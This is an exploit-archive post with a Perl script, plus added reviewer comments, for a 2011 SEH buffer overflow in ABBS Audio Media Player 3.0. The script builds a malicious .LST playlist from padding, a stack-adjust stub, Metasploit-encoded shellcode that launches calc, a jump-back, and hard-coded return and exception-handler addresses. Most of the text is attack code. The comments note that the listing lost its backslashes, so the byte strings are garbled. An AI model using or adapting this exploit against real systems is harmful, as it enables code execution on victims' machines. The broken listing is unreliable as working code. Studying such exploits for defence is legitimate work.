
ABBS Audio Media Player 3.0 .LST Buffer Overflow

Posted on 15 March 2011

# Exploit Title: ABBS Audio Media Player Buffer Overflow Exploit (SEH)
# Software Link: http://abbs.qsnx.net/downloads/abbs-amp.zip
# Version: 3.0
# Tested on: Win XP SP3 French
# Date: 14/03/2011
# Author: h1ch4m
# Email: h1ch4m@live.fr
# Home: http://net-effects.blogspot.com
#
# Analyst notes (review): this script only writes one crafted .LST playlist
# file to the current directory; it opens no network connection and never
# launches the target application. As reproduced on this page the listing has
# lost the backslashes from its escape sequences: "xb8" here is three literal
# ASCII characters, not the byte 0xB8, so the script as shown emits a text
# file rather than the byte layout the author's comments describe. It also
# lacks `use strict; use warnings;` and uses the two-argument form of open()
# on an undeclared global handle without an error check (see below).

my $file= "exploit.lst";
my $size = 4108; # make a room for our shellcode

# Stack-adjust stub. The per-line disassembly comments are the author's own
# claims about the intended bytes and are not re-verified here.
my $stack = "xb8xffxefxffxff" . # mov eax, 0xffffefff
"xf7xd0" . # not eax
"x29xc4"; # sub esp, eax

# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
# The payload description above is the author's; the only observable
# behaviour of this block is concatenation of string literals into $shellcode.
my $shellcode = "xbfxa0x03xb5xf2x33xc9xb1x32xdbxdfxd9x74x24" .
"xf4x5ax31x7ax0ex03x7ax0ex83x62x07x57x07x9e" .
"xe0x1exe8x5exf1x40x60xbbxc0x52x16xc8x71x63" .
"x5cx9cx79x08x30x34x09x7cx9dx3bxbaxcbxfbx72" .
"x3bxfaxc3xd8xffx9cxbfx22x2cx7fx81xedx21x7e" .
"xc6x13xc9xd2x9fx58x78xc3x94x1cx41xe2x7ax2b" .
"xf9x9cxffxebx8ex16x01x3bx3ex2cx49xa3x34x6a" .
"x6axd2x99x68x56x9dx96x5bx2cx1cx7fx92xcdx2f" .
"xbfx79xf0x80x32x83x34x26xadxf6x4ex55x50x01" .
"x95x24x8ex84x08x8ex45x3exe9x2fx89xd9x7ax23" .
"x66xadx25x27x79x62x5ex53xf2x85xb1xd2x40xa2" .
"x15xbfx13xcbx0cx65xf5xf4x4fxc1xaax50x1bxe3" .
"xbfxe3x46x69x41x61xfdxd4x41x79xfex76x2ax48" .
"x75x19x2dx55x5cx5excfxa4x6dx4ax58x1fx04x37" .
"x04xa0xf2x7bx31x23xf7x03xc6x3bx72x06x82xfb" .
"x6ex7ax9bx69x91x29x9cxbbxf2xacx0ex27xf5";

my $jump = "xe9x13xffxffxff"; # jump back 237 bytes

# pack('V', ...) encodes a 32-bit unsigned integer little-endian. The two
# addresses below are the author's hard-coded values for the tested build;
# the title's "(SEH)" and the $nseh/$seh naming indicate an exception-handler
# record overwrite, which is the class of bug that SafeSEH/SEHOP, DEP and
# ASLR exist to blunt. NOTE(review): 0x00407434 lies in the range usually
# occupied by the application's own image; presumably chosen because that
# module lacks those protections -- not verifiable from this page.
my $eip = pack('V', 0x7c86467b); # jmp esp
my $nseh = "xebxf5xffxff";
my $seh = pack('V', 0x00407434);

# Padding to reach $size. In the intact script this is a run of single 0x90
# bytes; in this listing "x90" is a 3-character string, so the multiplier
# arithmetic also no longer matches the intended layout. For a defender the
# useful signal is the shape of the artifact: a playlist of roughly 4 KB made
# almost entirely of one repeated value, which a parser length/content check
# on .LST input would reject before any fixed-size buffer is filled.
my $junk = "x90" x ($size-length($stack.$shellcode.$jump));

# Two-argument open with an interpolated filename and no `or die`: the mode
# is parsed out of the string, $FILE is an undeclared package global, and
# failure is silent. The safe form is `open my $fh, '>', $file or die "$!"`.
open($FILE,">$file");
print $FILE $junk.$stack.$shellcode.$jump.$eip.$nseh.$seh;
close($FILE); # write errors surface here and are likewise unchecked
print "Files Created successfully "; # trailing space; the newline was likely lost in extraction
sleep(1); # brief pause before exit; no functional purpose visible here

 
